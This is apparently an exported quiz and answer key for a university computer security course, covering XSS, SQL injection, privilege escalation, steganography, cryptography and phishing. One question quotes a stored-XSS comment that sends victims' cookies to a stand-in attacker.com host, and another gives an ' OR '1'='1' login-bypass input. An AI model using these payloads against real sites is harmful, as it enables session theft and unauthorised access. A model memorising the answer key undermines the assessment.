CS407 mini quiz
what is a true negative?
A true negative is where a user is correctly denied access
what is privellage escalation?
when a subject gains access to resources or functionality they aren't authorised to access through another subject.
what is vertical escalation?
where the user gains access to more privellaged accounts
what is horizontal escalation?
where the user is able to access the information of another user
what is entropy?
why? a concept created -the more random,less likely it can be compressed, the more effort it takes to break it. it's not entirely clear compression is the best measure for security of a password. it's how most password checks measure passwords other methods do exist, this is just the primary one a measure of a passwords randomness in regards to how difficult it would be to crack
A friend claims that storing user provided data in a database to be retrieved later and inserted in an HTML document is always safe from cross-site scripting (XSS) if you escape the following characters from the user input: <, >, ' Is this: Select one: a. false because there are characters which can be used to circumvent escaping b. true because these are the only characters which can be used for XSS c. false because not all these characters can be used in XSS d. true because these escape characters cannot be circumvented
A backslash (\) can be used to remove special meaning from a character thus escaping it, so an attacker can try to pre-empt escaping of special characters such as those used in XSS by including \ before special characters, which means there will be two backslashes, and the result is they cancel each other out. All these characters can be used in a XSS attack, but it is not a comprehensive list. Other characters such as / can be used. The correct answer is: false because there are characters which can be used to circumvent escaping
Which of the following verifies public key ownership? Select one: a. Key distribution centre b. Public Key Infrastructure c. Certificate Authority d. None of the above
A certificate authority verifies that a public key belongs to an entity. Public Key Infrastructure does include a certificate authority, but it is much more encompassing - it's the set of hardware, software, people, policies, and procedures that are needed to create, manage, distribute, use, store, and revoke digital certificates. The correct answer is: Certificate Authority
what is a false negative?
A false negative is where a legitimate user is denied access
what is a false positive?
A false positive happens when the system mistakenly lets a user access the system, when they shouldn't be allowed to do so
Which of the following best describes a biometric user authentication system operating in verification mode: Select one: a.The user does not claim an identity, instead the system extracts the template from the user and searches all templates in the database for a match b.The user claims an identity, then the system extracts the template from the user and checks to see if the extracted template matches the template for the claimed identity in the database
In biometric user authentication there are two modes: identification or vertification.In verification mode the user claims an identity, then the system checks to see if the template sufficiently closely matches the one for that identity in the database. In identification mode the system searches all templates in the database for a match to the provided template, no identity is claimed here. This can be thought of like in a watch list - you're trying to find someone in a database, but don't know their identity. The correct answer is: The user claims an identity, then the system extracts the template from the user and checks to see if the extracted template matches the template for the claimed identity in the database
Joe must send Ann a message and provide Ann with assurance that he was the actual sender. Which of the following keys could Joe use to best accomplish the objective?
Joe's private key
What type of encryption is used in Kerberos? Select one: a. Public key encryption b. RSA encryption c. Symmetric key encryption d. Diffie-Hellman
Kerberos relies on symmetric key encryption. A common misconception is that it uses public key encryption, of which RSA is a specific example - so both of those are incorrect. Diffie-Hellman is not an encryption technique, but a key exchange protocol so is not an option here. The correct answer is: Symmetric key encryption
A user has stored passwords hashed with MD5 and they claim this will stop sensitive data exposure, are they right? Select one: a. No because the data is hashed with an insecure hashing algorithm b. Yes because sensitive data exposure only applies to data in transit c. Yes because the data is hashed with a cryptographic hashing algorithm d. No because sensitive data exposure applies only to data at rest
MD5 has been identified as an insecure hashing algorithm and is easy to break, so despite the data being hashed it can still be considered sensitive data exposure as it will be easy to break. Sensitive data exposure is irrespective of whether the data is at rest or in transit. The correct answer is: No because the data is hashed with an insecure hashing algorithm
A friend explains they use a system which performs authentication as follows. On registration the user is asked to pick a username and password, and also to select 4 images from a set of 16. When authenticating, the system instructs individuals to provide their username and password as generated at registration, and then asks them to select one of their images. Does this describe multifactor authentication? Select one: a. Yes, because images are different from text b. No, because they're both created at the time of registration c. No, because they're both examples of knowledge d. Yes, because recognition is different to recall
Multifactor authentication is where authentication factors from different factors are used in combination. For example a knowledge factor and a token factor, or a knowledge factor and a biometric. This example is two knowledge factors, a graphical password and a text password so it is not multifactor authentication. All user authentication has to have a registration phase, this is irrelevant to multifactor authentication. The correct answer is: No, because they're both examples of knowledge
what is a true positive?
and a true positive is where a user is correctly granted access.
Which of the following statements explains best why BPCS can achieve a higher capacity? Select one: a. It uses a range of significant bits to attain a distributed pattern i.e. checkerboard pattern b.It embeds data in noise like regions without transpositions c.It uses a range of significant bits so long as they exhibit a high proportion of noise d. It identifies regions of high similarity to embed payload
The correct answer is: It uses a range of significant bits so long as they exhibit a high proportion of noise
Cryptography supports all of the core principles of information security except a. Confidentiality b. Integrity c. Authenticity d.Availability
The correct answer is: d. Availability
Network communication must be encrypted. Sara has selected a cipher which will encrypt 8 bits at a time. Which of the following best describes the approach Sara has selected? Select one: a. Stream cipher b. Cipher Block Chaining c.Hashing algorithm d.Block cipher
The correct answer is: d. Block cipher
If the LSB of the current byte (which is part of a pixel) is 1 and the bit to hide is 0, which of the following code excerpts would swap the LSB to match the bit to hide. Note that byt is the current byte of the cover image and bitToHide is the bit of the payload to be hidden. Select one: a.if(bitToHide==0) { byt &= 0x1; } b.if(bitToHide==0) { byt |= ~0x1; } c.if(bitToHide==0) { byt &= ~ 0x1; } d.if(bitToHide==0) { byt |= 0x1; }
The correct answer is: if(bitToHide==0) { byt &= ~ 0x1; }
Which of the following qualities is the best thing to look for in a potential cover image? Select one: a. A large mix of distinctly different colours b. A large area of a single colour c. A large area of a different shades of a colour d. A large area with a mix of black and white
The correct answer is: A large mix of distinctly different colours
What determines whether a block is used for hiding information in the BPCS algorithm? Select one: a. All blocks in higher bit planes are used b. Blocks are used if they have a sufficiently large proportion of changes from black to white c. All blocks in lower bit planes are used d. Blocks are used if they exhibit a checker board pattern
The correct answer is: Blocks are used if they have a sufficiently large proportion of changes from black to white
A former employee has decided to attack his former employer's website by signing up as a customer through their website. The attacker then logs in using their customer account and tries to access a website page /admin.php which he knows to have administrative functionality. Which type of vulnerability best describes the aspect the former employee is exploiting? Select one: a. Broken access control b. Using components with known vulnerabilities c. Security misconfiguration d. Broken authentication
The correct answer is: Broken access control
Which of the following options best describes how you could determine the capacity of a potential cover image when using the BPCS algorithm? Select one: a. The capacity using BPCS is always a maximum of 50% of the image size b. It depends on the number of noisy blocks in the least significant bit plane for each colour channel c. The capacity using BPCS is always a maximum of 12.5% of the image size d. It depends on the number of blocks in the image which are noisy in the bitplanes
The correct answer is: It depends on the number of blocks in the image which are noisy in the bitplanes
Which option identifies which blocks are checked for complexity in the BPCS algorithm Select one: a. The whole coverimage as a single block b. Payload blocks and bitplane blocks c. Payload blocks only d. Bitplane blocks only
The correct answer is: Payload blocks and bitplane blocks
What type of attack best describes the following scenario. An attacker visits a vulnerable website, and navigates to the comments page. They enter a comment as shown in quotes " this is my comment: [script] window.location='http://www.attacker.com/?cookie='+document.cookie [/script] Select one: a. Stored XSS because the comment is stored in the website's database b. Reflected XSS because it sends the victim to the attacker's website c. Stored XSS because it stores the cookies on the attacker's website d. Reflected XSS because it reflects the victim's cookies to the attacker's website
The correct answer is: Stored XSS because the comment is stored in the website's database
In the access control model proposed by Lampson which of the following best describes the role the reference monitor plays? Select one: a.It grants or denies a resource b.It represents an access request c.It grants or denies access d.It represents a user or a process
The reference monitor grants or denies access to an object. A user or process is represented by a subject in the model. An access request is represented as access request in the lampson model. It doesn't grant or deny a resource, as resources don't make requests. The correct answer is: It grants or denies access
Which of the following UNIX file permission details means only the owner can perform read, write and execute operations on the file. Note that r=read, w= write and x=execute. Select one: a. r--r--rwx b. r--rwxr-- c.rwxr--r--
Unix based systems the permissions follow the pattern owner group world so rwx needs to appear in the first three for the owner to perform these actions. The correct answer is: rwxr--r--
In a username and password field provided by a website, an attacker is trying to attack the user with account username Zendaya but they do not know the password. Which of the following combinations of input for the username and password is most likely to result in a successful SQL injection attack, assuming that the logic for processing the log in functionality checks only that the query has returned a result. Select one: a. Username=Zendaya, password=' OR '1'='1' b. Username=Zendaya password =OR 1=1 c. Username=Zendaya password= -- d. Username=Zendaya password =password
Username=Zendaya password= -- could work if ' was included to force a context switch to be interpreted as a command, but it doesn't. Username=Zendaya password =OR 1=1 has no context switch, so would just try a password of OR 1=1 Username=Zendaya password =password is a common password, so might work, but it's not the most likely Username=Zendaya, password=' OR '1'='1' is correct it has a ' to switch context and then condition or '1'='1' will evaluate to true The correct answer is: Username=Zendaya, password=' OR '1'='1
Which of the following would provide the strongest encryption? Select one: a.Data Encryption Standard (DES) with 56 bit keys b. Random One Time Pad c. Advanced Encryption Standard (AES) with 256 bit keys d. RSA with 1024 bit keys
Your answer is incorrect. The correct answer is: Random One Time Pad
For what reason would an attacker leverage promiscuous mode on a hub? Select one: a. To perform packet sniffing b. To perform port scanning c. To perform a Denial of Service d. To create a botnet
Your answer is incorrect. A hub sends all packets to all devices on a network, hence this can be leveraged to sniff all the packets. Port scanning checks all ports to see which are open and closed. A denial of service overloads a server with requests or by bandwidth flooding and so forth, it doesn't matter whether the network is using a hub or not. A botnet is a collection of computers which have been infected and can be remotely controlled by a bad actor/attacker, so this has no relevance to a hub being on the network. The correct answer is: To perform packet sniffing
Which of the following functions most accurately describes the function of a packet sniffer? Select one: a. It manages which packets are sent to which device on the network b. It identifies which ports are open c. It monitors network traffic d. It tracks devices connected to all local networks
Your answer is incorrect. A packet sniffer monitors network traffic, so you can see packets as they pass through the network. It doesn't track what is connected to the network. It also doesn't identify open ports - this is a port scanner. It doesn't manage where packets are sent on a network, this is the function of a router. The correct answer is: It monitors network traffic
A replay attack can make use of a stream of communication gathered by which of the following: Select one: a. packet sniffing only b. man-in-the-middle attack only c. both packet sniffing and man-in-the-middle d. none of the above options
Your answer is incorrect. A replay attack is where a packet of genuine communication is copied, and replayed typically to the server at a later time. Packet sniffing on a network can allow this packet to be copied, equally a man in the middle is where the client and server are fooled into communicating with the attacker rather than each other and the packet can be copied to potentially replay at a different time. The correct answer is: both packet sniffing and man-in-the-middle
Alice, Trent and Bob work for Chillflix. At Chillflix those in higher management positions are authorised to be able to complete more functionality than those lower in the hierarchy. Bob and Trent are managed by Alice. Which of the following scenarios best describes a vertical privilege escalation attack: Select one: a. Alice tries to log in as Bob b. Alice tries to log in as Trent c. Bob tries to log in as Trent d. Bob tries to log in as Alice e. Trent tries to log in as Bob
Your answer is incorrect. Bob is Alice's subordinate, and will likely have less privileges than she does. So Bob attempting to log in as Alice is the answer which best represents a vertical privilege escalation attack. All other attacks are either likely to reduce privileges (Alice attacking Bob or Trent), or have similar privileges (i.e. horizontal privilege escalation by Bob or Trent attacking each other). The correct answer is: Bob tries to log in as Alice
Which of the following is a social engineering attack that could be potentially mitigated if users paid closed attention to URLs embedded in emails as well as to URLs appearing in browser URL bars. Select one: a. phishing b. pharming c. man-in-the-middle d. shoulder surfing
Your answer is incorrect. Phishing often tries to encourage users to click on a link which takes them to a phishing website to provide their details to the attacker. If users are vigilant about inspecting URLs in emails, and also ensuring they check in the URL bar in browsers this can help mitigate falling for phishing attacks. Pharming wouldn't be mitigated by this as pharming involves the attacker redirecting the user to a malicious website without the user knowing, even if they directly type the legitimate URL into their browser e.g. by poisoning the user's DNS cache Shoulder surfing involves looking over someone's shoulder as they enter e.g. a username and password or PIN, so the URL doesn't impact this. Man-in-the-middle is a network attack which is not relevant here. The correct answer is: phishing
What type of attack is Secure Socket Layer (SSL) designed to address? Select one: a. man in the middle b. denial of service c. brute force d. replay
Your answer is incorrect. SSL helps to avoid a man in the middle attack as the server authenticates itself to the client using digital certificates. It doesn't help with replay as the client doesn't authenticate to the server and so the encrypted packet could be replayed at a later time. Brute force attacks have no clear application in this scenario. Denial of service is the client trying to overload the server e.g. through service requests - using SSL has no impact on this. The correct answer is: man in the middle
Fred receives an email which is purportedly from his boss. His boss says he knows he's been working hard on the Alpha project, particularly with the accounts. He is asked to make a large purchase out of the account which needs to be completed immediately. His boss claims he has mistakenly left this to the last minute and cannot complete it himself as he is currently tied up at a meeting. The e-mail address is not a known email address. Which of the following best describes the type of attack this is likely to be? Select one: a. pharming b. spear pharming c. spear phishing d. phishing
Your answer is incorrect. Spear phishing is the best description as it is specifically targeted at the victim, and not generalised and sent to a lot of people. Pharming redirects a legitimate website's traffic to an attackers website. There's no such thing as spear pharming. The correct answer is: spear phishing
Which of the following best describes the difference between stored procedures and parameterised queries? Select one: a. Parameterised queries are created in the database, and called from the application whilst stored procedures are constructed server side b. Stored procedures are created in the database, and called from the application, parameterised queries are constructed server side
Your answer is incorrect. Stored procedures are created in the database, and called from the application, parameterised queries are constructed server side The correct answer is: Stored procedures are created in the database, and called from the application, parameterised queries are constructed server side
Sergey is the personal assistant to a high ranking politician. Whilst working he receives a call from someone claiming to be contacting the politician for a pre-arranged interview. Sergey checks the diary and it's not in there. The caller says, "ahh, no it was a woman in HR who organised it and she said she couldn't access his diary". Which of the following techniques best describes the social engineering tactic being employed in this scenario? Select one: a. making people like you b. pretext c. authority d. reciprocation
Your answer is incorrect. The attacker is providing pretext which is that they have been invited for an interview. There's no element of reciprocation here as the attacker hasn't provided the victim with anything which would make them feel obliged to reciprocate. Whilst the attacker is not being unpleasant, there's no particular element which would suggest they are trying to make the victim like them. There's also no element of authority mentioned. The correct answer is: pretext
PayPal have sent you an email saying that they have detected suspicious activity on your account. They have locked your account until you provide security information to prove that you are the owner of the account. The email asks you to provide these details by filling out the attached form and clicking its "Submit" button or by replying to their email with answers to a list of questions, like "what is your mother's maiden name?" and "what bank do you use for your personal checking?" and even "what are your bank account numbers for all of your current accounts?" Which of the following aspects signifies this is likely to be a phishing email? Select one: a. the sense of urgency b. requiring the user to open an attachment c. asking the user to provide personal details d. all of the above
Your answer is incorrect. There is an element of urgency in that they suggest your account won't be usable until you let them know your details.They are also asking the user open an attachment and asking for personal details. It's a combination of all these aspects which suggest this is likely to be a phishing email. The correct answer is: all of the above
a fingerprint biometric authentication system mistakenly accepts a user's biometric as their fingerprint template is very similar to another user's who is in the database. what is this an example of?
a false positive
The best way to defeat frequency analysis as a method of cryptanalysis for a traditional cipher is to use which of the following: a. Transposition ciphers b. Polyalphabetic ciphers c. Substitution ciphers d. Monoalphabetic ciphers
b. Polyalphabetic ciphers
When a user needs to demonstrate message integrity, which option is best? Select one: a. Encrypt the message with the recipient's public key so the recipient can decrypt it with the corresponding private key b. Send a hash of the message to the recipient c. Send a digital signature of the message to the recipient d. Encrypt the message with a symmetric algorithm using an agreed key, and send it to the recipient
c. Send a digital signature of the message to the recipient.
test
test